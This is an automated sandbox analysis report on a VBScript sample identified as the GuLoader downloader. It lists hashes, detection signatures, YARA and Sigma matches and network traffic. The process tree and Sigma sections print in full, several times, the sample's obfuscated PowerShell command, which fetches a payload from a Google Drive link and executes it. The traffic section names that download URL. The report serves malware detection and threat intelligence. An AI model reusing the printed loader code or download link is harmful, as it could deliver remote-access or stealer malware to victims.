Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2669976595_366408723_KHI_SOF_240702_0957_P.vbs

Overview

General Information

Sample name:2669976595_366408723_KHI_SOF_240702_0957_P.vbs
Analysis ID:1466659
MD5:8a1a3c704c957d6638e61b5d4e4814a2
SHA1:800fcc7219cab666231b2fc8c9fd7463160be8db
SHA256:11a67ec7519d527b1351ba13a36ea0ef91b38a1be0c0d27dafdc9884c57a4894
Tags:vbs
Infos:

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7596 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni lP eB.(B,$SaU.onirdGegfal bdSueBrs S, .$TeASqr ,cF,h,ni TnIn)Am ';$Archin=$Fuset[0];Convictively (Reeling ',a$Fog tlSuoAlbIna.alMa:G.R .e,erN aYakMaeGa= e(InT Se.lsVit C- aP.raCotGehCh Di$F,AUnr.ic ghUfi fn L)Di ');while (!$Rerake) {Convictively (Reeling 'Op$.vgHylReoF.b ha Al D:TuST tAuoSurDimb a Ds tC.=Ro$ FtG.rMaulyeDr ') ;Convictively $promachos;Convictively (Reeling ' USGatBraTar Pt B-AuSG.l eeCheUnp H ,r4Ez ');Convictively (Reeling ' U$A,g PlBloa,bPeaKllCe:FoRP.ePhrPraVakt,e ,=An(flTRoeC,sGytse-T.P,iaS teghRe Ut$S.A Hr ncsah EiH.nLi)Tu ') ;Convictively (Reeling ',i$SagSklfooslbPha VlEl: EmCiy koidpMua tr Da olI y,ns.oiBusK,=.v$LegUmlVkoLibMaaH l F: .S foOur yt.rkF.r GiV.di.tI sSat eElgFrnL,iConOsgSoeKarSun,teBr+An+F %Bi$PeR,piPrvSciRenAtiQuaU nMi. CcSeoHauConE,tHv ') ;$Undgldes=$Rivinian[$myoparalysis];}$Forblndede=332547;$Antisiphon=26001;Convictively (Reeling ' u$ lgLel,eoBebUnaTal :MaBP,lU.yT,a SnAmt Ws tEne EgG n oi EnBrg.seOvrVi I=N gGSke t .-SpC boUdn.ut Ce Dn .t na$ AAF,rEfc Th Si.nnEt ');Convictively (Reeling ' T$G,gB lFeoReb GaTrl P:HeSFukheiSem,omE.ePht S St=Oc Ve[TrS Sy.us StR,eBemPr.L,CAdo ,n .vIne ,rCatBa].o: b: FG.r ,o,amDiBCha Ds ,eTr6s.4H S,et rP,iM n Ag B( .$saBSalMoyB,aF,n,atU.sArt ,e xgSpn,liRlntrgInestrBe)Z. ');Convictively (Reeling 'Ta$H,g .lShoNub AaK.lCe:ChPJorRev MeFlkSprDetLi S =my T.[ USR.yU,sEntTreBomT .OtTPre Mx,ft ,.ThE nApcVao AdTaiHanDjgM ]Gr:Pa:BaA S.oC I,xISt.s GMyeFot,tSI tRir Cio nF.gRa( T$ MS,bkNaiLem imVaeFotI,)Ta ');Convictively (Reeling 'Co$Bug ,lMoo bReaFal R:.yB.ne prK.cMae Eaa uSa=Ko$DePf.rT vsoe KkVorElt ,. sViu ob Cs Mt .rOpiLin SgNn(Jo$emF loDerCibBolArn KdumeStdFoeSp,Hj$ EA Bn,rt NiFrsT,iBrpShhR.oFynPa) G ');Convictively $Berceau;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2300 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3552 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni lP eB.(B,$SaU.onirdGegfal bdSueBrs S, .$TeASqr ,cF,h,ni TnIn)Am ';$Archin=$Fuset[0];Convictively (Reeling ',a$Fog tlSuoAlbIna.alMa:G.R .e,erN aYakMaeGa= e(InT Se.lsVit C- aP.raCotGehCh Di$F,AUnr.ic ghUfi fn L)Di ');while (!$Rerake) {Convictively (Reeling 'Op$.vgHylReoF.b ha Al D:TuST tAuoSurDimb a Ds tC.=Ro$ FtG.rMaulyeDr ') ;Convictively $promachos;Convictively (Reeling ' USGatBraTar Pt B-AuSG.l eeCheUnp H ,r4Ez ');Convictively (Reeling ' U$A,g PlBloa,bPeaKllCe:FoRP.ePhrPraVakt,e ,=An(flTRoeC,sGytse-T.P,iaS teghRe Ut$S.A Hr ncsah EiH.nLi)Tu ') ;Convictively (Reeling ',i$SagSklfooslbPha VlEl: EmCiy koidpMua tr Da olI y,ns.oiBusK,=.v$LegUmlVkoLibMaaH l F: .S foOur yt.rkF.r GiV.di.tI sSat eElgFrnL,iConOsgSoeKarSun,teBr+An+F %Bi$PeR,piPrvSciRenAtiQuaU nMi. CcSeoHauConE,tHv ') ;$Undgldes=$Rivinian[$myoparalysis];}$Forblndede=332547;$Antisiphon=26001;Convictively (Reeling ' u$ lgLel,eoBebUnaTal :MaBP,lU.yT,a SnAmt Ws tEne EgG n oi EnBrg.seOvrVi I=N gGSke t .-SpC boUdn.ut Ce Dn .t na$ AAF,rEfc Th Si.nnEt ');Convictively (Reeling ' T$G,gB lFeoReb GaTrl P:HeSFukheiSem,omE.ePht S St=Oc Ve[TrS Sy.us StR,eBemPr.L,CAdo ,n .vIne ,rCatBa].o: b: FG.r ,o,amDiBCha Ds ,eTr6s.4H S,et rP,iM n Ag B( .$saBSalMoyB,aF,n,atU.sArt ,e xgSpn,liRlntrgInestrBe)Z. ');Convictively (Reeling 'Ta$H,g .lShoNub AaK.lCe:ChPJorRev MeFlkSprDetLi S =my T.[ USR.yU,sEntTreBomT .OtTPre Mx,ft ,.ThE nApcVao AdTaiHanDjgM ]Gr:Pa:BaA S.oC I,xISt.s GMyeFot,tSI tRir Cio nF.gRa( T$ MS,bkNaiLem imVaeFotI,)Ta ');Convictively (Reeling 'Co$Bug ,lMoo bReaFal R:.yB.ne prK.cMae Eaa uSa=Ko$DePf.rT vsoe KkVorElt ,. sViu ob Cs Mt .rOpiLin SgNn(Jo$emF loDerCibBolArn KdumeStdFoeSp,Hj$ EA Bn,rt NiFrsT,iBrpShhR.oFynPa) G ');Convictively $Berceau;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 4584 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.2666861261.000000000632B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      Process Memory Space: powershell.exe PID: 1296JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 1296INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x187f17:$b2: ::FromBase64String(
        • 0x187f4e:$b2: ::FromBase64String(
        • 0x187f86:$b2: ::FromBase64String(
        • 0x187fbf:$b2: ::FromBase64String(
        • 0x187ff9:$b2: ::FromBase64String(
        • 0x188034:$b2: ::FromBase64String(
        • 0x188070:$b2: ::FromBase64String(
        • 0x1880ad:$b2: ::FromBase64String(
        • 0x1880eb:$b2: ::FromBase64String(
        • 0x18812a:$b2: ::FromBase64String(
        • 0x18816a:$b2: ::FromBase64String(
        • 0x1881ab:$b2: ::FromBase64String(
        • 0x1881ed:$b2: ::FromBase64String(
        • 0x188230:$b2: ::FromBase64String(
        • 0x188274:$b2: ::FromBase64String(
        • 0x1882b9:$b2: ::FromBase64String(
        • 0x1882ff:$b2: ::FromBase64String(
        • 0x188346:$b2: ::FromBase64String(
        • 0x18838e:$b2: ::FromBase64String(
        • 0x23bfdf:$b2: ::FromBase64String(
        • 0x50f82:$s1: -join
        Process Memory Space: powershell.exe PID: 3552JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Click to see the 1 entries

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_1296.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi32_3552.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xdb75:$b2: ::FromBase64String(
            • 0xcc10:$s1: -join
            • 0x63bc:$s4: +=
            • 0x647e:$s4: +=
            • 0xa6a5:$s4: +=
            • 0xc7c2:$s4: +=
            • 0xcaac:$s4: +=
            • 0xcbf2:$s4: +=
            • 0x15aa9:$s4: +=
            • 0x15b29:$s4: +=
            • 0x15bef:$s4: +=
            • 0x15c6f:$s4: +=
            • 0x15e45:$s4: +=
            • 0x15ec9:$s4: +=
            • 0xd41c:$e4: Get-WmiObject
            • 0xd60b:$e4: Get-Process
            • 0xd663:$e4: Start-Process
            • 0x1672e:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs", ProcessId: 7596, ProcessName: wscript.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs", ProcessId: 7596, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni lP eB.(B,$SaU.onirdGegfal bdSueBrs S, .$TeASqr ,cF,h,ni TnIn

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.8:56535 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.8:56536 version: TLS 1.2
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2679288955.0000000008C99000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: .Core.pdb source: powershell.exe, 0000000D.00000002.2679288955.0000000008C70000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.Core.pdbk source: powershell.exe, 0000000D.00000002.2673202295.0000000007C74000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.Core.pdb source: powershell.exe, 0000000D.00000002.2673202295.0000000007C74000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: powershell.exe, 0000000D.00000002.2673202295.0000000007BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: powershell.exe, 0000000D.00000002.2673202295.0000000007C53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftuP
            Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396989812.0000023820D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
            Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396989812.0000023820D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Is?
            Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396989812.0000023820D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab5y
            Source: wscript.exe, 00000000.00000003.1392197030.0000023820DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1391984395.0000023820D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d145861cc9953
            Source: wscript.exe, 00000000.00000003.1392197030.0000023820DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1391984395.0000023820D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabM
